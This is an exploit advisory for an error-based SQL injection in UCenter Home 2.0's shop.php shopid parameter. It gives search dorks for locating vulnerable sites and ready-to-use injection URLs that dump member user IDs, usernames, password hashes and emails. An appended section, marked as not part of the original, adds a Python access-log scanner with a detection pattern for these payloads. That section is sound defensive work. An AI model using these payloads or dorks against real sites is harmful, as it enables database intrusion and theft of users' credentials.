__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

To inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
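
Added example (not part of the original advisory and not the author's or the project's code): a log check for the parameter named above. It flags requests to shop.php?ac=view whose shopid is not a plain integer and labels those carrying constructs of the MySQL error-based technique; the access-log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructs used by the MySQL error-based technique the advisory names.
MARKERS = re.compile(
    r"information_schema|floor\s*\(\s*rand\s*\(|group\s+by|concat\s*\(|\bselect\b",
    re.IGNORECASE,
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Classify one request target: 'ok', 'invalid_shopid' or 'sqli_error_based'."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/shop.php"):
        return "ok"
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes
    if "view" not in params.get("ac", []):
        return "ok"
    verdict = "ok"
    for value in params.get("shopid", []):
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # a plain numeric id is the only expected shape
        if MARKERS.search(value):
            return "sqli_error_based"
        verdict = "invalid_shopid"
    return verdict

def scan(log_lines):
    """Return (line_number, verdict) for every log line that is not 'ok'."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else "ok"
        if verdict != "ok":
            hits.append((number, verdict))
    return hits

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 811',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),floor(rand(0)*2)x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 702',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /Shop.php?ac=view&shopid=abc HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the injection point; the log check only shows who has been probing it.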